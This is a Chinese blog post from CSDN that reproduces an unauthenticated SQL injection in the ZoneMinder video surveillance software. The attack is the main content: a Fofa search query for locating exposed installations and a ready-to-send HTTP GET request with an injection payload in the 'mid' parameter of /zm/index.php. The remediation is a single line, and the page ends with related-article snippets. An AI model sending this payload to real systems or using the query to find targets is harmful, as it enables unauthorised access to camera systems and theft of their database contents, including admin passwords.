ZoneMinder视频监控系统SQL注入

于 2024-08-28 10:53:46 发布
阅读量177 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141635038
版权

0x01 漏洞描述:

ZoneMinder(简称ZM)是一套基于Linux操作系统的摄像机的视像数据监控的应用软件(大家可以简单理解为网络摄像机)。ZoneMinder支持单一或多台视像镜头应用,包括摄取、分析、记录(包括移动侦测功能)、和监视来源。index.php接口处存在sql注入,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x02 搜索语句:

Fofa:icon_hash="-1218152116"

0x03 漏洞复现:

GET /zm/index.php?limit=20&mid=-1%20OR%203*233*1=699%20AND%20000322=000322&order=desc&request=watch&sort=Id&view=request HTTP/1.1
User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/94.0.2558.72Safari/537.36
Host: your-ip
Accept-Encoding: gzip, deflate
Accept:*/*

0x04 修复建议:

关闭互联网暴露面或接口设置访问权限
iSee857
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞复现】ZoneMinder远程命令执行
失心少年
12-21 1235
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。使用ZM最大好处是可以在摄像头监视的情况之下实现动态的图像识别,即判断某指定区域之内是否有外来人或物入侵,如果有的话则可以将相关的图像和视频保存起来,并通过网络进行监视。默认情况下,在受影响的版本中,无需鉴权就可以调用"/zm/index.php"中的"create snapshot"操作。
实例讲解二阶SQL注入
systemino的博客
08-02 1737
二阶SQL注入简述 所谓二阶注入是指已存储(数据库、文件)的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。 二阶注入也是SQL注入的一种,与我们平时接触最多的一阶SQL注入相比利用门槛更高。普通的一阶SQL注入数据直接就进入到SQL查询中,而二阶SQL注入则是输入数据经处理后存储,然后取出数据,最后才进入到SQL查询。 事实上你在网上搜索到的SQL注入文章,大部分都可以归结为一阶...
HW漏洞威胁情报第十九天|HW情报
weixin_43167326的博客
08-14 922
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
linux后台系统
fishmai的专栏
07-04 7771
[荐] 分布式跟踪系统 Zipkin Zipkin 是 Twitter 的一个开源项目,允许开发者收集 Twitter 各个服务上的监控数据,并提供查询接口。 该系统让开发者可通过一个 Web 前端轻松的收集和分析数据,例如用户每次请求服务的处理时间等,可方便的监测...更多Zipkin信息 最新新闻: Zipkin —— Twitter 的开源项目用于监控服务响应 2012年06月0
开源项目大全 >> ...
weixin_34071713的博客
06-20 545
http://www.isenhao.com/xueke/jisuanji/kaiyuan.php 监控系统-Nagios 网络流量监测图形分析工具-Cacti 分布式系统监视-zabbix 系统监控工具-MRTG 开源视频监控系统-ZoneMinder 系统信息采集和监控工具-Tsar 开源的移动分析应用-Countly 分布式跟踪系统-Zipkin ...
ZoneMinder视频监控系统 1.26.5 PHP+MYSQL.rar
07-09
ZoneMinder是一款开源视频监控系统ZoneMinder的作者是因为家中的车库被窃,因而产生设计监控保全的念头。 ZoneMinder使用了Linux Server,PHP,MySQL加上几支摄影机,就可以使用web介面监控重要场所。当异常事件...
ZoneMinder视频监控系统.7z
03-14
ZoneMinder是一款强大的开源视频监控系统,主要用于管理、记录和监测IP摄像头以及模拟摄像头的视频流。这个系统基于Linux操作系统,提供了一整套完整的安全监控解决方案。它支持多种硬件设备,包括USB摄像头、网络...
ZoneMinder视频监控系统 1.26.5 PHP+MYSQL.zip
10-05
ZoneMinder是一个开源的视频监控系统,专为Linux平台设计,用于管理、记录、监视以及控制网络摄像头。这个系统的核心特点在于它强大的运动检测功能,能够有效地识别和记录监控区域内的动态变化。ZoneMinder 1.26.5是...
ZoneMinder视频监控系统 1.26.5.gz
05-24
ZoneMinder是一款开源视频监控系统ZoneMinder的作者是因为家中的车库被窃,因而产生设计监控保全的念头。 ZoneMinder使用了Linux Server,PHP,MySQL加上几支摄影机,就可以使用web介面监控重要场所。当异常事件...
开源视频监控系统 zoneminder
02-17
开源视频监控系统 zoneminder ZoneMinder的作者是因為家中的車庫被竊,因而產生設計監控保全的念頭。 ZoneMinder使用了Linux Server,PHP,MySQL加上幾支攝影機,就可以使用web介面監控重要場所。當異常事件發生時,...
证券行业加密业务安全风险监测与防御技术研究
qq_61863348的博客
08-27 568
摘要:解决证券⾏业加密流量威胁问题、加密流量中的应⽤⻛险问题,对若⼲证券⾏业的实际流量内容进⾏调研分析, 分析了证券⾏业加密流量⾯临的合规性⻛险和加密协议及证书本⾝存在的⻛险、以及可能存在的外部加密流量威 胁,并提出防御策略和措施。关键字:证券加密业务、加密应用、加密流量、商用密码安全评估、加密风险、加密威胁、监测防御数据爆发式增长的DT(Data technology)时代,加密技术是数据传输的重要保护手段。随着互联网和企业内部流量场景的加密化趋势快速增长,证券行业也面临着更加迫切的加密需求。证券行业涉及
【网络安全】网络安全中的常见攻击方式:被动攻击、主动攻击与中间人攻击
最新发布
一定要站在自己热爱的生活里闪闪发光
08-27 185
在信息化时代,网络安全已经成为企业和个人都非常关注的领域。无论是个人隐私还是企业机密,随着互联网的广泛应用,保护这些信息免受攻击变得越来越重要。攻击者通过各种方式试图获取、篡改或破坏信息,这些方式大致可以分为被动攻击、主动攻击和中间人攻击三类。了解这些攻击方式有助于我们更好地保护自己的信息安全
需方软件供应链安全保障要求及开源场景对照自评表(上)
LJQClqjc的博客
08-27 112
开源软件供应链作为软件供应链的一种特殊形式,该国标亦适用于指导开源软件供应链中的供需双方开展组织管理和供应活动管理,增强开源软件供应链组织管理和供应活动管理能力,防范供应链导致的开源软件产品及其生命周期中断类的供应关系风险,防止供应活动在开源软件及其生命周期服务中引入新的技术安全风险和知识产权风险(例如:防止供应活动引入的软件漏洞、后门、篡改、伪造、许可协议不合规等),保障业务持续稳定安全运行。以下根据我们的分析研究,对国标中与开源供应链安全直接相关的内容进行识别与分析,供业内参考。
ChaCha20:高效且安全的流密码算法
jiamisoft的博客
08-23 518
ChaCha20作为一种现代流密码算法,以其高速性能和良好的安全性,在信息安全领域占据了一席之地。随着技术的发展,ChaCha20将继续在保护数据安全方面发挥重要作用。同时,随着量子计算技术的进步,我们也需要关注ChaCha20等现有加密算法在量子时代的安全性,并积极探索新的加密技术。
中间件安全
2201_75572825的博客
08-20 1307
Tomcat是一个开源的Java Servlet容器,它可以作为独立的Web服务器或应用服务器,也可以作为其他Web服务器的插件来使用,如Apache HTTP Server。Tomcat支持JavaServlet、JavaServer Pages (JSP) 、Java Expression Language (EL) 和WebSocket等Java技术,并提供了许多企业级特性,如集群、安全性和可扩展性。
密码管理最佳实践:安全存储与定期更换的艺术
A526847的博客
08-27 380
在数字化时代,密码作为我们个人信息与资产安全的第一道防线,其重要性不言而喻。然而,随着网络威胁日益复杂多样,仅仅设置一个强密码已不足以保障安全。良好的密码管理实践,特别是安全存储与定期更换密码,成为了维护个人与企业安全的关键。本文将深入探讨这两项密码管理艺术的精髓。
【MySQL数据库管理问答题】第7章 MySQL 安全
Songyaxuan075118的博客
08-27 435
常见的网络安全风险防范措施 防火墙和入侵检测系统 数据加密 强制身份验证和授权 基于角色的访问控制 定期更新和补丁管理 日志记录和监控 安全意识培训 与 SSL相关的文件功能说明 ca.pem server-cert.pem server-key.pem ca-key.pem client-cert.pem client-key.pem MySQL 8.0 企业防火墙的特点和功能 实时 SQL 注入防护 白名单模式 学习模式 报告与监控 多层次防护
利用Nginx反向代理优化Web应用的性能与安全
陆业聪
08-24 1186
本文探讨了Nginx作为Web服务器和反向代理的功能,重点在于性能优化、安全增强和负载均衡。内容涉及负载均衡技术、静态资源缓存、HTTP/2支持、HTTPS配置及防DDoS策略。文章强调了Nginx在现代Web架构中的关键作用。
linux视频监控系统的优秀案例
06-10
以下是一些优秀的Linux视频监控系统案例: 1. ZoneMinder:是一款开源的视频监控系统,支持多种网络摄像头和视频捕获卡,可以进行视频录制、图像分析和远程访问。ZoneMinder使用PHP和MySQL进行开发,支持Linux系统。 2. MotionEyeOS:是一款基于Linux的开源视频监控系统,支持多种网络摄像头和视频捕获卡,可以进行视频录制、图像分析和远程访问。MotionEyeOS使用Python和Flask进行开发,支持树莓派等嵌入式设备。 3. Shinobi:是一款开源的视频监控系统,支持多种网络摄像头和视频捕获卡,可以进行视频录制、图像分析和远程访问。Shinobi使用Node.js和MongoDB进行开发,支持Linux系统。 4. Bluecherry:是一款商业化的视频监控系统,支持多种网络摄像头和视频捕获卡,可以进行视频录制、图像分析和远程访问。Bluecherry使用PHP和MySQL进行开发,支持Linux系统。 5. Xeoma:是一款商业化的视频监控系统,支持多种网络摄像头和视频捕获卡,可以进行视频录制、图像分析和远程访问。Xeoma使用C++进行开发,支持Windows、Linux和MacOS等操作系统。 这些视频监控系统都具有不同的特点和优势,可以根据实际需求进行选择和使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值